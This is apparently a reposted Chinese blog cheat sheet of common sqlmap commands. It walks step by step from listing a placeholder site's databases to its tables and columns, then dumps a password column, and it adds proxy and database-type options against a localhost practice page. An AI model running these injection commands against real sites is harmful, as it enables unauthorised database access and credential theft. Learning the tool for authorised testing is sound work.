zoukankan      html  css  js  c++  java
  • sqlmap常用命令

    ---------------------------------------------------------------------------------------------------------------------------------------------
    (1) 查找数据库

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" --dbs

    (2) 通过1中的数据库查找对应的表 (假如通过1,得到的是dataname)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname --tables

    (3) 通过2中的数据表得到字段(假如得到的是tablename表)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename --columns

    (4) 通过3得到字段值(假如从3中得到字段id,password)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename -C "password" --dump


    -------------------------------------------------------------------------------------------------------------------------------------------
    使用代理

    sqlmap.py -u "http://localhost/sqlzhurulianxi.php?id=1" --proxy=http://127.0.0.1:8080

    指定数据库类型

    sqlmap.py -u “http://localhost/sqlzhurulianxi.php?id=1” --dbms=MySQL

  • 相关阅读:
    bzoj 2599
    bzoj 3697
    poj 1741
    bzoj 2741
    bzoj 5495
    bzoj 3261
    网络流24题——骑士共存问题 luogu 3355
    网络流24题——数字梯形问题 luogu 4013
    bzoj 3998
    网络流24题——魔术球问题 luogu 2765
  • 原文地址:https://www.cnblogs.com/thespace/p/12335596.html
Copyright © 2011-2022 走看看